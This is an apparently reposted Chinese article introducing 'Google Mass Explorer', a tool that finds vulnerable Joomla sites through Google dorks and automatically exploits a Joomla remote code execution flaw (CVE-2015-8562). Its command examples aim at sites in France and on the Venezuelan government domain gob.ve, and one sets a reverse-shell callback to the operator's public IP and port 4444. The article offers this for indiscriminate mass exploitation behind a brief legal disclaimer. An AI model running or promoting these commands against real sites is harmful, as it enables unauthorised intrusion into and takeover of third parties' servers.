cve 爬虫_好用的Google漏洞爬虫:Google Mass Explorer
*本文中涉及到的相關漏洞已報送廠商并得到修復,本文僅限技術研究與討論,嚴禁用于非法用途,否則產生的一切后果自行承擔。
這是一款基于谷歌搜索引擎的自動化爬蟲。
爬蟲介紹
爬蟲大體機制就是:先進行一次谷歌搜索,將結果解析為特定格式,然后再提供給exp使用。
大家可以嘗試使用--help來列出所有參數。
這個項目筆者會持續更新,以后再添加新的exp進行升級。此外,它會利用google_parsers模塊去構建exp解析搜索結果,所以當你開始搜索時,可以選擇“--exploit parser”參數來指定相應exp。
google parsers模塊(google_parsers.py)以后還會繼續優化,而現在的exp只含有joomla cve,畢竟這個項目主要是給大家自己diy使用的。但是,如果你不會弄exp,把利用exp提交給過來也行。
由于筆者平時還是比較忙,所以沒有太多時間去手動搜索目標。故而,筆者嘗試使用Selenium框架去造了個爬蟲來搜尋測試目標。至于搜索過程中出現的Google的驗證碼,它需要其他庫和模塊來輔助解決。在項目里使用Selenium后,大家就可以在谷歌出現驗證碼的是時候,自行手動輸入驗證碼,然后爬蟲就可以繼續爬行了。這大概是筆者能想出的最好的解決驗證碼防護的辦法了。
簡單概述下爬蟲是如何工作的:1. 執行谷歌搜索
2. 從每一頁解析結果
3. 測試是否結果中含有漏洞
依賴與需求
這個項目需要python3,使用requirements安裝依賴庫的方法如下:$ sudo pip install -r requirements.txt
運行示例:python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2015_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="Fran?a" --last_update="no último mês"
在上面的例子里,筆者是在尋找法國的joomla RCE目標,使用的是google_domains.txt里面的google域名(比如google.co.uk)來作為搜索引擎,“--last_update”則代表著搜索結果的更新時間為上個月。
上面例子里的選項適用于任何語言,主要決定于google針對相應的國家給出的語法。
下面再給出一個簡單的例子:python3 google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"
當然,這些exp也是可以單獨使用的:$ cd xpl_parsers
$ python joomla_cve_2015_8562.py
單獨測試exp的方法:$ cd exploits
$ python exploiter.py --file
* 參考來源:Github,FB小編dawner編譯,轉載請注明來自FreeBuf(FreeBuf.COM)
總結
以上是生活随笔為你收集整理的cve 爬虫_好用的Google漏洞爬虫:Google Mass Explorer的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: vs中没有fstream_vs++201
- 下一篇: js title 单选框 获取_js简单